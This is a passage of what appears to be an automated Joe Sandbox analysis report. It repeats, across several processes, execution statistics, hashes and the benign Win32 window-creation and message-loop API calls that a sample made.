                                                    • Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D

                                                    Execution Graph

                                                    Execution Coverage:83.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:5
                                                    Total number of Limit Nodes:1

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00401000 1 Function_00401AE1 1->0

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                    • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                    • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                    • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                    • UpdateWindow.USER32(00000001), ref: 004010C7
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                    • TranslateMessage.USER32(?), ref: 004010E4
                                                    • DispatchMessageA.USER32(?), ref: 004010ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1747601337.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1747576456.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1747622387.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1747644178.0000000000403000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1747644178.0000000000408000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1747687873.0000000000411000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1747687873.0000000000E11000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1748744061.0000000000F80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_x11.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                    • String ID: 0$WinClass32
                                                    • API String ID: 282685165-2329282442
                                                    • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                    • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                      • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                      • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                      • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                      • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                      • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                      • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                      • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                      • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                      • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                    • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1747601337.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1747576456.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1747622387.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1747644178.0000000000403000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1747644178.0000000000408000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1747687873.0000000000411000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1747687873.0000000000E11000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000002.00000002.1748744061.0000000000F80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_x11.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                    • String ID:
                                                    • API String ID: 673778540-0
                                                    • Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
                                                    • Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D

                                                    Execution Graph

                                                    Execution Coverage:83.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:5
                                                    Total number of Limit Nodes:1

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00401000 1 Function_00401AE1 1->0

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                    • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                    • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                    • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                    • UpdateWindow.USER32(00000001), ref: 004010C7
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                    • TranslateMessage.USER32(?), ref: 004010E4
                                                    • DispatchMessageA.USER32(?), ref: 004010ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1760145705.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1760116520.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1760168867.0000000000402000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1760197819.0000000000403000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1760197819.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1760243274.0000000000411000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1760243274.0000000000E11000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1761072827.0000000000F7E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_x10.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                    • String ID: 0$WinClass32
                                                    • API String ID: 282685165-2329282442
                                                    • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                    • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                      • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                      • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                      • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                      • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                      • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                      • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                      • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                      • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                      • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                    • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1760145705.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1760116520.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1760168867.0000000000402000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1760197819.0000000000403000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1760197819.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1760243274.0000000000411000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1760243274.0000000000E11000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1761072827.0000000000F7E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_x10.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                    • String ID:
                                                    • API String ID: 673778540-0
                                                    • Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
                                                    • Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D

                                                    Execution Graph

                                                    Execution Coverage:83.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:5
                                                    Total number of Limit Nodes:1

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00401000 1 Function_00401AE1 1->0

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                    • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                    • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                    • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                    • UpdateWindow.USER32(00000001), ref: 004010C7
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                    • TranslateMessage.USER32(?), ref: 004010E4
                                                    • DispatchMessageA.USER32(?), ref: 004010ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1767293731.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.1767269872.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1767313536.0000000000402000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1767339009.0000000000403000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1767339009.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1767384900.0000000000411000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1767384900.0000000000E11000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1768277467.0000000000F7D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_x9.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                    • String ID: 0$WinClass32
                                                    • API String ID: 282685165-2329282442
                                                    • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                    • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                      • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                      • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                      • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                      • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                      • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                      • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                      • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                      • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                      • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                    • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1767293731.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000004.00000002.1767269872.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1767313536.0000000000402000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1767339009.0000000000403000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1767339009.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1767384900.0000000000411000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1767384900.0000000000E11000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.1768277467.0000000000F7D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_x9.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                    • String ID:
                                                    • API String ID: 673778540-0
                                                    • Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
                                                    • Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D

                                                    Execution Graph

                                                    Execution Coverage:83.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:5
                                                    Total number of Limit Nodes:1

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00401000 1 Function_00401AE1 1->0

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                    • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                    • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                    • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                    • UpdateWindow.USER32(00000001), ref: 004010C7
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                    • TranslateMessage.USER32(?), ref: 004010E4
                                                    • DispatchMessageA.USER32(?), ref: 004010ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1776902359.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1776876234.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1776924089.0000000000402000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1776946586.0000000000403000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1776946586.0000000000408000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1776992187.0000000000411000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1776992187.0000000000E11000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1777943460.0000000000F7B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_x8.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                    • String ID: 0$WinClass32
                                                    • API String ID: 282685165-2329282442
                                                    • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                    • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                      • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                      • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                      • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                      • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                      • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                      • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                      • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                      • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                      • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                    • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1776902359.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000005.00000002.1776876234.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1776924089.0000000000402000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1776946586.0000000000403000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1776946586.0000000000408000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1776992187.0000000000411000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1776992187.0000000000E11000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.1777943460.0000000000F7B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_x8.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                    • String ID:
                                                    • API String ID: 673778540-0
                                                    • Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
                                                    • Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D

                                                    Execution Graph

                                                    Execution Coverage:83.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:5
                                                    Total number of Limit Nodes:1

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00401000 1 Function_00401AE1 1->0

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                    • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                    • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                    • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                    • UpdateWindow.USER32(00000001), ref: 004010C7
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                    • TranslateMessage.USER32(?), ref: 004010E4
                                                    • DispatchMessageA.USER32(?), ref: 004010ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1788155648.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000006.00000002.1787886889.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1788266804.0000000000402000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1788476571.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1788476571.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1788672180.0000000000411000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1788672180.0000000000E11000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1789765763.0000000000F79000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_x7.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                    • String ID: 0$WinClass32
                                                    • API String ID: 282685165-2329282442
                                                    • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                    • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                      • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                      • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                      • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                      • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                      • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                      • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                      • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                      • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                      • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                    • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1788155648.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000006.00000002.1787886889.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1788266804.0000000000402000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1788476571.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1788476571.0000000000408000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1788672180.0000000000411000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1788672180.0000000000E11000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000006.00000002.1789765763.0000000000F79000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_x7.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                    • String ID:
                                                    • API String ID: 673778540-0
                                                    • Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
                                                    • Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D

                                                    Execution Graph

                                                    Execution Coverage:83.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:5
                                                    Total number of Limit Nodes:1

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00401000 1 Function_00401AE1 1->0

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                    • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                    • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                    • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                    • UpdateWindow.USER32(00000001), ref: 004010C7
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                    • TranslateMessage.USER32(?), ref: 004010E4
